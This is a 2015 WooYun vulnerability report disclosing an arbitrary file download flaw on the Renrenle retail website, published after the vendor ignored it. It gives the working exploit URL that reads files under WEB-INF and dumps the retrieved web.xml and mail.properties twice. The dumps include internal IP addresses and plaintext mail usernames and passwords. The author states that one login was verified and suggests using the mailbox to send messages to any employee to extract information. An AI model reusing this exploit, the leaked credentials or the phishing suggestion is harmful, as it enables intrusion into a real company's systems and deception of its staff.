当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106025

漏洞标题:人人乐网站存在下载文件漏洞可以通过下载到web的各种配置文件

相关厂商:人人乐

漏洞作者: 路人甲

提交时间:2015-04-05 16:20

修复时间:2015-05-20 16:22

公开时间:2015-05-20 16:22

漏洞类型:应用配置错误

危害等级:中

自评Rank:7

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

人人乐网站存在下载任意文件漏洞

详细说明:

人人乐网站存在下载任意文件漏洞:
http://www.renrenle.cn/share/download.jsp?filePath=/WEB-INF/web.xml
web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4">
<display-name>rrl</display-name>
<context-param>
<param-name>dataSource</param-name>
<param-value>java:/WEBDS</param-value>
</context-param>
<context-param>
<param-name>contextConfigLocation</param-name>
<param-value>/WEB-INF/applicationContext.xml</param-value>
</context-param>
<listener>
<listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
</listener>
<filter>
<display-name>IPFilter</display-name>
<filter-name>IPFilter</filter-name>
<filter-class>com.rrl.web.filters.IPFilter</filter-class>
<init-param>
<param-name>allowList</param-name>
<param-value>127.0.0.1,172.</param-value>
</init-param>
<init-param>
<param-name>denyList</param-name>
<param-value>183.233.224.230</param-value>
</init-param>
<init-param>
<param-name>denyPage</param-name>
<param-value>/index.jsp</param-value>
</init-param>
<init-param>
<param-name>checkURL</param-name>
<param-value>.jsp,.do</param-value>
</init-param>
</filter>
<filter-mapping>
<filter-name>IPFilter</filter-name>
<url-pattern>/admin/*</url-pattern>
</filter-mapping>
<servlet>
<servlet-name>initServlet</servlet-name>
<servlet-class>com.rrl.web.servlet.InitializationServlet</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet>
<servlet-name>DisplayChart</servlet-name>
<servlet-class>com.rrl.web.servlet.DisplayChartServlet</servlet-class>
<init-param>
<param-name>chartConfigLocation</param-name>
<param-value>/WEB-INF/chart.properties</param-value>
</init-param>
<load-on-startup>2</load-on-startup>
</servlet>
<servlet>
<servlet-name>SimpleUploader</servlet-name>
<servlet-class>com.ckeditor.uploader.SimpleUploaderServlet</servlet-class>
<init-param>
<param-name>baseDir</param-name>
<param-value>/UserFiles/</param-value>
</init-param>
<init-param>
<param-name>debug</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>enabled</param-name>
<param-value>true</param-value>
</init-param>
<init-param>
<param-name>AllowedExtensionsFile</param-name>
<param-value></param-value>
</init-param>
<init-param>
<param-name>DeniedExtensionsFile</param-name>
<param-value>
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|ftl
</param-value>
</init-param>
<init-param>
<param-name>AllowedExtensionsImage</param-name>
<param-value>jpg|gif|jpeg|png|bmp</param-value>
</init-param>
<init-param>
<param-name>DeniedExtensionsImage</param-name>
<param-value></param-value>
</init-param>
<init-param>
<param-name>AllowedExtensionsFlash</param-name>
<param-value>swf|fla|flv</param-value>
</init-param>
<init-param>
<param-name>DeniedExtensionsFlash</param-name>
<param-value></param-value>
</init-param>
<load-on-startup>0</load-on-startup>
</servlet>
<servlet>
<servlet-name>verificationCode</servlet-name>
<servlet-class>com.rrl.web.servlet.VerificationCodeServlet</servlet-class>
<load-on-startup>5</load-on-startup>
</servlet>
<servlet>
<servlet-name>SimpleCaptcha</servlet-name>
<servlet-class>nl.captcha.servlet.SimpleCaptchaServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>SimpleUploader</servlet-name>
<url-pattern>/ckeditor/uploader</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>DisplayChart</servlet-name>
<url-pattern>/servlet/DisplayChart</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>verificationCode</servlet-name>
<url-pattern>/verifyCode.jsp</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>SimpleCaptcha</servlet-name>
<url-pattern>/CaptchaImg</url-pattern>
</servlet-mapping>
<welcome-file-list>
<welcome-file>index.jsp</welcome-file>
<welcome-file>index.html</welcome-file>
<welcome-file>index.htm</welcome-file>
</welcome-file-list>
<jsp-config>
<taglib>
<taglib-uri>http://ckeditor.com</taglib-uri>
<taglib-location>/WEB-INF/ckeditor.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>/WEB-INF/app</taglib-uri>
<taglib-location>/WEB-INF/app.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>/WEB-INF/oscache</taglib-uri>
<taglib-location>/WEB-INF/oscache.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://java.sun.com/jsp/jstl/core</taglib-uri>
<taglib-location>/WEB-INF/c.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://java.sun.com/jsp/jstl/fmt</taglib-uri>
<taglib-location>/WEB-INF/fmt.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://java.sun.com/jsp/jstl/functions</taglib-uri>
<taglib-location>/WEB-INF/fn.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://java.sun.com/jsp/jstl/sql</taglib-uri>
<taglib-location>/WEB-INF/sql.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://java.sun.com/jsp/jstl/xml</taglib-uri>
<taglib-location>/WEB-INF/x.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://java.sun.com/jsp/jstl/core_rt</taglib-uri>
<taglib-location>/WEB-INF/c-rt.tld</taglib-location>
</taglib>
</jsp-config>
</web-app>
可以通过一堆配置文件找到邮箱配置程序:
http://www.renrenle.cn/share/download.jsp?filePath=/WEB-INF/mail.properties
可以在这个配置文件中找到管理员邮箱配置:
# Properties file with mail-related settings, used for scheduled info emails.
# Applied by PropertyPlaceholderConfigurer from "applicationContext.xml".
# Targeted at system administrators, to avoid touching the context XML files.
#mail.host=172.25.20.181
#mail.username=sys
#mail.password=sysrrl
#mail.defaultEncoding=
#
#[email protected]
#[email protected]
#[email protected]
# Inner mail setting.
mail.inner.host=172.25.1.180
mail.inner.username=sys
mail.inner.password=sysrrl
mail.inner.defaultEncoding=
[email protected]
[email protected]
[email protected]
mail.inner.update.notifySubject=\u7f51\u7ad9\u5185\u5bb9\u9700\u66f4\u65b0\u63d0\u9192
mail.inner.update.notifySQL=select * from nbemail where today-enddate>=days
mail.inner.update.notifyText=\u60a8\u8d1f\u8d23\u7684\u7f51\u7ad9\u5185\u5bb9\u9700\u66f4\u65b0,\u8bf7\u5c3d\u5feb\u63d0\u4ea4\u6700\u65b0\u5185\u5bb9\u5230\u5f20\u658c\u5904,\u8c22\u8c22
[email protected]
mail.inner.update.bcc=
mail.inner.csmessage.configSQL=select value from config where name='tsemail'
# Outer mail setting.
mail.outer.host=172.25.0.17
#mail.outer.host=172.25.0.18
mail.outer.username=rrl
mail.outer.password=[S.@n7AY
mail.outer.defaultEncoding=GBK
[email protected]
mail.outer.poster.subject=\u4eba\u4eba\u4e50\u96c6\u56e2\u6700\u65b0\u4fc3\u9500\u6d77\u62a5
经foxmail验证可以登录。可以借助此邮件给人人乐任意员工发送邮件来获取信息

漏洞证明:

人人乐网站存在下载任意文件漏洞:
http://www.renrenle.cn/share/download.jsp?filePath=/WEB-INF/web.xml
web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4">
<display-name>rrl</display-name>
<context-param>
<param-name>dataSource</param-name>
<param-value>java:/WEBDS</param-value>
</context-param>
<context-param>
<param-name>contextConfigLocation</param-name>
<param-value>/WEB-INF/applicationContext.xml</param-value>
</context-param>
<listener>
<listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
</listener>
<filter>
<display-name>IPFilter</display-name>
<filter-name>IPFilter</filter-name>
<filter-class>com.rrl.web.filters.IPFilter</filter-class>
<init-param>
<param-name>allowList</param-name>
<param-value>127.0.0.1,172.</param-value>
</init-param>
<init-param>
<param-name>denyList</param-name>
<param-value>183.233.224.230</param-value>
</init-param>
<init-param>
<param-name>denyPage</param-name>
<param-value>/index.jsp</param-value>
</init-param>
<init-param>
<param-name>checkURL</param-name>
<param-value>.jsp,.do</param-value>
</init-param>
</filter>
<filter-mapping>
<filter-name>IPFilter</filter-name>
<url-pattern>/admin/*</url-pattern>
</filter-mapping>
<servlet>
<servlet-name>initServlet</servlet-name>
<servlet-class>com.rrl.web.servlet.InitializationServlet</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet>
<servlet-name>DisplayChart</servlet-name>
<servlet-class>com.rrl.web.servlet.DisplayChartServlet</servlet-class>
<init-param>
<param-name>chartConfigLocation</param-name>
<param-value>/WEB-INF/chart.properties</param-value>
</init-param>
<load-on-startup>2</load-on-startup>
</servlet>
<servlet>
<servlet-name>SimpleUploader</servlet-name>
<servlet-class>com.ckeditor.uploader.SimpleUploaderServlet</servlet-class>
<init-param>
<param-name>baseDir</param-name>
<param-value>/UserFiles/</param-value>
</init-param>
<init-param>
<param-name>debug</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>enabled</param-name>
<param-value>true</param-value>
</init-param>
<init-param>
<param-name>AllowedExtensionsFile</param-name>
<param-value></param-value>
</init-param>
<init-param>
<param-name>DeniedExtensionsFile</param-name>
<param-value>
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|ftl
</param-value>
</init-param>
<init-param>
<param-name>AllowedExtensionsImage</param-name>
<param-value>jpg|gif|jpeg|png|bmp</param-value>
</init-param>
<init-param>
<param-name>DeniedExtensionsImage</param-name>
<param-value></param-value>
</init-param>
<init-param>
<param-name>AllowedExtensionsFlash</param-name>
<param-value>swf|fla|flv</param-value>
</init-param>
<init-param>
<param-name>DeniedExtensionsFlash</param-name>
<param-value></param-value>
</init-param>
<load-on-startup>0</load-on-startup>
</servlet>
<servlet>
<servlet-name>verificationCode</servlet-name>
<servlet-class>com.rrl.web.servlet.VerificationCodeServlet</servlet-class>
<load-on-startup>5</load-on-startup>
</servlet>
<servlet>
<servlet-name>SimpleCaptcha</servlet-name>
<servlet-class>nl.captcha.servlet.SimpleCaptchaServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>SimpleUploader</servlet-name>
<url-pattern>/ckeditor/uploader</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>DisplayChart</servlet-name>
<url-pattern>/servlet/DisplayChart</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>verificationCode</servlet-name>
<url-pattern>/verifyCode.jsp</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>SimpleCaptcha</servlet-name>
<url-pattern>/CaptchaImg</url-pattern>
</servlet-mapping>
<welcome-file-list>
<welcome-file>index.jsp</welcome-file>
<welcome-file>index.html</welcome-file>
<welcome-file>index.htm</welcome-file>
</welcome-file-list>
<jsp-config>
<taglib>
<taglib-uri>http://ckeditor.com</taglib-uri>
<taglib-location>/WEB-INF/ckeditor.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>/WEB-INF/app</taglib-uri>
<taglib-location>/WEB-INF/app.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>/WEB-INF/oscache</taglib-uri>
<taglib-location>/WEB-INF/oscache.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://java.sun.com/jsp/jstl/core</taglib-uri>
<taglib-location>/WEB-INF/c.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://java.sun.com/jsp/jstl/fmt</taglib-uri>
<taglib-location>/WEB-INF/fmt.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://java.sun.com/jsp/jstl/functions</taglib-uri>
<taglib-location>/WEB-INF/fn.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://java.sun.com/jsp/jstl/sql</taglib-uri>
<taglib-location>/WEB-INF/sql.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://java.sun.com/jsp/jstl/xml</taglib-uri>
<taglib-location>/WEB-INF/x.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://java.sun.com/jsp/jstl/core_rt</taglib-uri>
<taglib-location>/WEB-INF/c-rt.tld</taglib-location>
</taglib>
</jsp-config>
</web-app>
可以通过一堆配置文件找到邮箱配置程序:
http://www.renrenle.cn/share/download.jsp?filePath=/WEB-INF/mail.properties
可以在这个配置文件中找到管理员邮箱配置:
# Properties file with mail-related settings, used for scheduled info emails.
# Applied by PropertyPlaceholderConfigurer from "applicationContext.xml".
# Targeted at system administrators, to avoid touching the context XML files.
#mail.host=172.25.20.181
#mail.username=sys
#mail.password=sysrrl
#mail.defaultEncoding=
#
#[email protected]
#[email protected]
#[email protected]
# Inner mail setting.
mail.inner.host=172.25.1.180
mail.inner.username=sys
mail.inner.password=sysrrl
mail.inner.defaultEncoding=
[email protected]
[email protected]
[email protected]
mail.inner.update.notifySubject=\u7f51\u7ad9\u5185\u5bb9\u9700\u66f4\u65b0\u63d0\u9192
mail.inner.update.notifySQL=select * from nbemail where today-enddate>=days
mail.inner.update.notifyText=\u60a8\u8d1f\u8d23\u7684\u7f51\u7ad9\u5185\u5bb9\u9700\u66f4\u65b0,\u8bf7\u5c3d\u5feb\u63d0\u4ea4\u6700\u65b0\u5185\u5bb9\u5230\u5f20\u658c\u5904,\u8c22\u8c22
[email protected]
mail.inner.update.bcc=
mail.inner.csmessage.configSQL=select value from config where name='tsemail'
# Outer mail setting.
mail.outer.host=172.25.0.17
#mail.outer.host=172.25.0.18
mail.outer.username=rrl
mail.outer.password=[S.@n7AY
mail.outer.defaultEncoding=GBK
[email protected]
mail.outer.poster.subject=\u4eba\u4eba\u4e50\u96c6\u56e2\u6700\u65b0\u4fc3\u9500\u6d77\u62a5
经foxmail验证可以登录。可以借助此邮件给人人乐任意员工发送邮件来获取信息

修复方案:

对下载进行路径限制

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)